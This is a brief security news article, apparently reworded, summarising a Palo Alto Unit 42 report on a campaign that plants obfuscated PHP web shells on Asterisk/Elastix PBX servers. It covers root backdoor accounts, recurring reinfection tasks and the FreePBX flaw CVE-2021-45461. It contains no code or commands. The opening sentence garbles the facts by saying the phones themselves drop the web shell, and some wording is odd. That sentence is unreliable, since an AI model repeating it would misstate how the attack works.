VoIP phones using Digium’s software aim to drop a web shell onto their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads.
“The malware installs multi-layered obfuscated PHP backdoors to the web server’s file system, downloads new payloads to run, and schedules recurring tasks to reinfect the host system,” Palo Alto Networks Unit 42 said in a Friday report.
The unusual activity is said to have started in mid-December 2021 and focuses on Asterisk, a widely used software implementation of a private branch exchange (PBX) running on the open-source Elastix Unified Communications Server.
Unit 42 said the burglaries share similarities with the INJ3CTOR3 campaign released by Israeli cybersecurity firm Check Point in November 2020, citing the possibility that they could be a “revival” of the earlier attacks.
Coinciding with the sudden surge is the public disclosure in December 2021 of a now-patched remote code execution flaw in Free PBX, a web-based open source GUI used to monitor and manage Asterisk. Tracked as CVE-2021-45461the problem is rated with a 9.8 out of 10 for severity.
The attacks begin by fetching a first dropper shell script from a remote server, which in turn is orchestrated to install the PHP web shell in different locations in the file system and to create two root user accounts to maintain remote access.
It further creates a scheduled task that runs every minute and retrieves a remote copy of the shell script from the attacker’s controlled domain for execution.
In addition to taking measures to cover its tracks, the malware is also equipped to execute arbitrary commands, which ultimately allows the hackers to take control of the system, steal information while also maintaining a backdoor to the compromised hosts.
“The strategy of implanting web shells into vulnerable servers is not a new tactic for malicious actors,” the researchers said.